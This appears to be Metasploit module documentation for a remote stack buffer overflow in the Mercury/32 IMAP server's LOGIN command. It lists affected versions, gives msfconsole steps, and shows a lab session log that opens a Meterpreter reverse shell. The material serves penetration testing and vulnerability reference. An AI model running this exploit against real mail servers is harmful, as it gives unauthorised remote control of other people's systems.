Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.

Vulnerable Application

This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).

Mercury/32 v4.01a
Mercury/32 v4.01b upgrade

This module has been tested successfully on:

Mercury/32 v4.01a on Windows XP SP3 (x86)
Mercury/32 v4.01a on Windows 7 SP1 (x86)
Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
Mercury/32 v4.01b on Windows 7 SP1 (x86)

Verification steps

Install the vulnerable Mercury/32 application
Start msfconsole
Do: use exploit/windows/imap/mercury_login
Do: set RHOST IP
Do: exploit
You should get a shell.

Scenarios

Mercury/32 v4.01a on Windows 7 SP1 x86

msf > use exploit/windows/imap/mercury_login1
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
rhost => 192.168.46.144
msf exploit(windows/imap/mercury_login1) > exploit

[*] Started reverse TCP handler on 192.168.46.1:4444
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
[*] Sending stage (179779 bytes) to 192.168.46.144
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200

meterpreter >
Computer        : WIN-DQ8ELRSOJAO
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Provide feedback

Saved searches

Use saved searches to filter your results more quickly